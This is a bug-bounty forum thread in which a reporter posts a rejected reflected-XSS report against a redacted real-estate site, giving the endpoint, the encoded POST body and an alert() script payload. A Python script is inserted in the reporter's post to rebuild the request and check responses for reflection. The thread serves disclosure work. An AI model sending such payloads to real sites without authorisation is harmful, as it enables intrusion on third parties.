Can't reproduce vulnerability

Questions or requests about submissions
willc
Can't reproduce vulnerability

Post by willc » Fri Jun 15, 2018 12:33 pm

632611

I have tried to submit this several times, but it keeps getting rejected. It is literally the simplest thing to reproduce, and I have included the steps to reproduce it. It would be very helpful to know why it is being rejected. Thanks.

x1admin
Site Admin

Re: Can't reproduce vulnerability

Post by x1admin » Mon Jun 18, 2018 6:35 am

willc wrote:
Fri Jun 15, 2018 12:33 pm
632611

I have tried to submit this several times, but it keeps getting rejected. It is literally the simplest thing to reproduce, and I have included the steps to reproduce it. It would be very helpful to know why it is being rejected. Thanks.
You forgot to provide PoC

AnotherWayIn

Re: Can't reproduce vulnerability

Post by AnotherWayIn » Mon Jun 18, 2018 10:00 am

I have the same. It would be helpful if we could be given a short reason why it was rejected.

willc

Re: Can't reproduce vulnerability

Post by willc » Mon Jun 18, 2018 3:23 pm

x1admin wrote:
Mon Jun 18, 2018 6:35 am

You forgot to provide PoC
Where is a PoC supposed to be provided? There is no PoC field in the submission form. And in what format? A screenshot?

There is so much about this process that seems unclear.

x1admin
Site Admin

Re: Can't reproduce vulnerability

Post by x1admin » Tue Jun 19, 2018 6:58 am

Our report form has hints and examples; please read them.

willc

Re: Can't reproduce vulnerability

Post by willc » Tue Jun 19, 2018 12:04 pm

Thank you for the curt response. None of the form fields or tool tips have any verbiage about "Proof of concept." I have read and re-read them all numerous times. The instructions I included in the report had the very simple steps listed to reproduce the exploit.

Other submissions have been approved, and they were submitted the same way.

Here is what I posted. Please let me know what is insufficient to prevent this problem from happening yet again:
-----------------------
Vulnerability Type: XSS

XSS URL:
http://www.[REDACTED].com/idx/search-form/

POST Data (x-www-form-urlencoded):

POST /property-search/sist_ajax/get_locations.asp

searchParameters=%7B%22searchTerm%22%3A%22%3Cscript%3Ealert(%5C%22OPENBUGBOUNTY%5C%22)%3C%2Fscript%3E%22%2C%22limit%22%3A10%2C%22siteId%22%3A%22376%22%2C%22mlsRegions%22%3A%2251%2C+25%2C+79%2C+103%22%2C%22facets%22%3A%5B%7B%22id%22%3A10%2C%22label%22%3A%22Address%22%2C%22example%22%3A%221234+Main+St%22%7D%2C%7B%22id%22%3A11%2C%22label%22%3A%22MLS+%23%22%2C%22example%22%3A%221234567%22%7D%5D%2C%22filters%22%3A%7B%22openHouses%22%3Afalse%2C%22status%22%3A%22Active%22%2C%22listTypes%22%3A%220%22%2C%22listTypeDescrip%22%3A%22%22%2C%22price%22%3A%7B%22min%22%3A-1%2C%22max%22%3A-1%7D%2C%22location%22%3A%7B%22id%22%3A-1%2C%22value%22%3A%22%22%7D%2C%22restrictLevel%22%3A1%2C%22restrictStatusLevel%22%3A0%7D%7D

Cookies: N/A

Application: Custom Code

Comment:

STEPS TO REPRODUCE:
In Chrome or Firefox:

1. Go to http://www.[REDACTED].com/idx/search-form/

2. Enter this into the "Quick Search by Address or MLS Number" search field:

<script>alert("OPENBUGBOUNTY")</script>

Press Enter/Return.
I look forward to your response. Thanks.
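The report above carries everything a reviewer needs to replay the request: the endpoint path, the form-encoded body, and the payload. The script below is an added example (not the reporter's submission and not Open Bug Bounty's code) that decodes that exact POST body, rebuilds it, and classifies how a response reflects the payload. The two sample responses are constructed for the demonstration, not captured from any real site, and the redacted host is not filled in; the `post_search` helper is the only part that touches the network and is not invoked by default.

```python
"""Decode, rebuild and check the reflected-XSS request from the report above.

Added example; not the reporter's or the platform's code. Runs offline on
constructed sample responses.
"""
import html
import json
import urllib.request
from urllib.parse import parse_qs, urlencode

# POST body copied verbatim from the report above.
REPORT_POST_BODY = "searchParameters=%7B%22searchTerm%22%3A%22%3Cscript%3Ealert(%5C%22OPENBUGBOUNTY%5C%22)%3C%2Fscript%3E%22%2C%22limit%22%3A10%2C%22siteId%22%3A%22376%22%2C%22mlsRegions%22%3A%2251%2C+25%2C+79%2C+103%22%2C%22facets%22%3A%5B%7B%22id%22%3A10%2C%22label%22%3A%22Address%22%2C%22example%22%3A%221234+Main+St%22%7D%2C%7B%22id%22%3A11%2C%22label%22%3A%22MLS+%23%22%2C%22example%22%3A%221234567%22%7D%5D%2C%22filters%22%3A%7B%22openHouses%22%3Afalse%2C%22status%22%3A%22Active%22%2C%22listTypes%22%3A%220%22%2C%22listTypeDescrip%22%3A%22%22%2C%22price%22%3A%7B%22min%22%3A-1%2C%22max%22%3A-1%7D%2C%22location%22%3A%7B%22id%22%3A-1%2C%22value%22%3A%22%22%7D%2C%22restrictLevel%22%3A1%2C%22restrictStatusLevel%22%3A0%7D%7D"

# The payload the report says was typed into the search field.
PAYLOAD = '<script>alert("OPENBUGBOUNTY")</script>'


def decode_search_parameters(body):
    """Return the JSON object carried in the searchParameters form field."""
    fields = parse_qs(body, strict_parsing=True)
    return json.loads(fields["searchParameters"][0])


def build_post_body(params):
    """Inverse of decode_search_parameters: JSON-encode, then form-encode.

    Spaces become '+' exactly as in the body from the report.
    """
    return urlencode({"searchParameters": json.dumps(params, separators=(",", ":"))})


def classify_reflection(response_body, payload):
    """Classify how a response reflects the payload.

    'raw'     - payload appears verbatim (script executes if rendered as HTML)
    'escaped' - only an HTML-entity-encoded copy appears (safe in HTML text)
    'absent'  - payload not found in either form
    """
    if payload in response_body:
        return "raw"
    if html.escape(payload, quote=True) in response_body:
        return "escaped"
    return "absent"


def post_search(endpoint_url, body, timeout=10):
    """POST the form-encoded body and return the response text.

    Network helper only; the offline demonstration below does not call it.
    endpoint_url is assumed to be the redacted host plus the path from the
    report, e.g. http://www.<host>/property-search/sist_ajax/get_locations.asp
    """
    req = urllib.request.Request(
        endpoint_url,
        data=body.encode("ascii"),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        return resp.read().decode(charset, "replace")


# Constructed sample responses (not captured from any real site): one echoes
# the search term into HTML unescaped, the other entity-encodes it.
VULNERABLE_RESPONSE = (
    '<div class="results">No results for '
    '<script>alert("OPENBUGBOUNTY")</script></div>'
)
FIXED_RESPONSE = (
    '<div class="results">No results for '
    '&lt;script&gt;alert(&quot;OPENBUGBOUNTY&quot;)&lt;/script&gt;</div>'
)

if __name__ == "__main__":
    params = decode_search_parameters(REPORT_POST_BODY)
    print("searchTerm from report:", params["searchTerm"])
    rebuilt = build_post_body(params)
    print("rebuilt body round-trips:", decode_search_parameters(rebuilt) == params)
    print("vulnerable sample:", classify_reflection(VULNERABLE_RESPONSE, PAYLOAD))
    print("fixed sample:     ", classify_reflection(FIXED_RESPONSE, PAYLOAD))
```

One caveat when using this against the real endpoint: `get_locations.asp` is an AJAX endpoint, and if it answers with JSON, the echoed term will contain `\"` rather than a bare quote, so `classify_reflection` reports `absent` even though the search-results page that later renders that value may still be vulnerable. Check the HTML the browser actually renders (step 2 of the report), not only the raw AJAX body.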

x1admin
Site Admin

Re: Can't reproduce vulnerability

Post by x1admin » Wed Jun 20, 2018 6:56 am

willc wrote:
Tue Jun 19, 2018 12:04 pm
Thank you for the curt response. None of the form fields or tool tips have any verbiage about "Proof of concept." I have read and re-read them all numerous times. The instructions I included in the report had the very simple steps listed to reproduce the exploit.
In report 632611 you forgot to provide POST data
